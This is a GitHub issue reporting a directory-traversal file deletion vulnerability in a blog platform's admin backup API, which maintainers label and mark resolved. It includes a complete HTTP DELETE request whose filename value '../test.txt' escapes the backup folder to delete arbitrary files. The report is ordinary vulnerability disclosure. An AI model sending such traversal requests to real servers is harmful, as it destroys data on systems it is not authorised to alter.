Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

An Arbitrary file deletion vulnerability in the backend #422

Closed
5 tasks done
any-how opened this issue Dec 11, 2019 · 0 comments
Closed
5 tasks done

An Arbitrary file deletion vulnerability in the backend #422

any-how opened this issue Dec 11, 2019 · 0 comments
Assignees
Labels
kind/bug Categorizes issue or PR as related to a bug. resolved vulnerability Vulnerability

Comments

@any-how
Copy link

any-how commented Dec 11, 2019

I am sure I have checked


I want to apply

  • BUG feedback

There is a backup function in the background. When we delete our backup files, we can delete any files on the system through directory traversal.

DELETE /api/admin/backups/halo?filename=../test.txt HTTP/1.1
Host: xxx:8090
Admin-Authorization: 19cfedbb4994443c8b3f7eebf9ef36b3
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
Origin: http://xxxx:8090
Referer: http://xx/admin/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

My backup file directory is at /tmp/halo-backup/. The above message can delete the test.txt file in the /tmp directory

@JohnNiang JohnNiang added kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability labels Dec 11, 2019
@JohnNiang JohnNiang self-assigned this Dec 12, 2019
JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
* fix: moving menu team causes submenus to be lost

Signed-off-by: Ryan Wang <i@ryanc.cc>

* fix: moving menu team causes submenus to be lost

Signed-off-by: Ryan Wang <i@ryanc.cc>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
kind/bug Categorizes issue or PR as related to a bug. resolved vulnerability Vulnerability
Projects
None yet
Development

No branches or pull requests

2 participants